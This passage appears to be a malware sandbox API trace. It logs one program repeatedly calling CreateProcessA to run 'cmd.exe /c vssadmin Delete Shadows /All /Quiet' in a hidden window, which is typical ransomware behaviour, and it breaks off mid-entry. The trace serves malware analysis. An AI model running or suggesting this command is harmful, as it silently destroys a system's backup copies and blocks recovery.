CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.352] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.352] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.352] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.352] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.353] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.353] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.353] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.353] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.353] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.353] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.353] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.353] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.353] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.353] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.353] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.353] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.354] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.354] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.354] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.354] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.354] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.354] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.354] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.354] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.354] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.354] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.355] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.355] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.355] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.355] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.355] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.355] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.355] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.355] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.355] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.355] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.355] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.356] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.356] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.356] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.356] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.356] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.356] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.356] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.356] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.356] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.356] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.356] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.357] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.357] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.357] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.357] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.357] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.357] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.357] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.357] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, 